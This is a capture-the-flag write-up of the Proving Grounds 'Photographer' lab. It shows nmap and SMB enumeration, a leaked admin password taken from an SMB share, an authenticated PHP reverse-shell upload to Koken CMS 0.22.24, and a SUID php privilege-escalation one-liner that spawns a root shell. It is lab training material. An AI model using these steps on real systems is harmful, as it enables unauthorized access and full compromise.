Proving grounds Play: Photographer

- 4 mins


22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 414daa1886948e88a74c6b426076f14f (RSA)
|   256 4da3d07a8f64ef82452d011318b7e013 (ECDSA)
|_  256 1a017a4fcf9585bf31a14f1587ab94e2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu)) Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Koken 0.22.24
|_http-title: daisa ahomi
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web PORT: 8000


The meta data in the landing page source revealed the CMS version.

<meta name="generator" content="Koken 0.22.24" />

The version Koken 0.22.24 is vulnerable to Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated).

Directory Fuzzing


SMB Share

Enumerate smb share.

naveenj@hackerspace:|22:56|~/pg-play/Photographer$ smbclient -L // -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	sambashare      Disk      Samba on Ubuntu
	IPC$            IPC       IPC Service (photographer server (Samba, Ubuntu))

Connect to SMB share.

naveenj@hackerspace:|22:56|~/pg-play/Photographer$ smbclient  // -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Aug 20 11:51:08 2020
  ..                                  D        0  Thu Aug 20 12:08:59 2020
  mailsent.txt                        N      503  Mon Jul 20 21:29:40 2020                   N 13930308  Mon Jul 20 21:22:23 2020

Download mailsent.txt file and view to obtain the credentials for the admin portal.

Message-ID: <>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

Credentials babygirl Login to the koen admin portal.

Initial Foothold

After login to the admin portal Direct to Library - Content - Import Content.

Create a php remote code execution code or a php reverse shell and save it as image.php.jpg. Use Burp Suite to intercept the image upload traffic and change the file name to image.php.

Once the file is uploaded click on the file and on the right side scroll down and click view option. Then hover over the image download button and click to trigger the reverse shell.


Privilege Escalation


Enumerate the SUIDs in the sysytem.

www-data@photographer:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/php7.2     #Exploitable


If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

sudo install -m =xs $(which php) .

    ./php -r "pcntl_exec('/bin/sh', ['-p']);"


Root Obtained

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.

Naveen J

Naveen J

Security Researcher | Appsec Specialist@SISA Information Security | Web 3 Security Enthusiast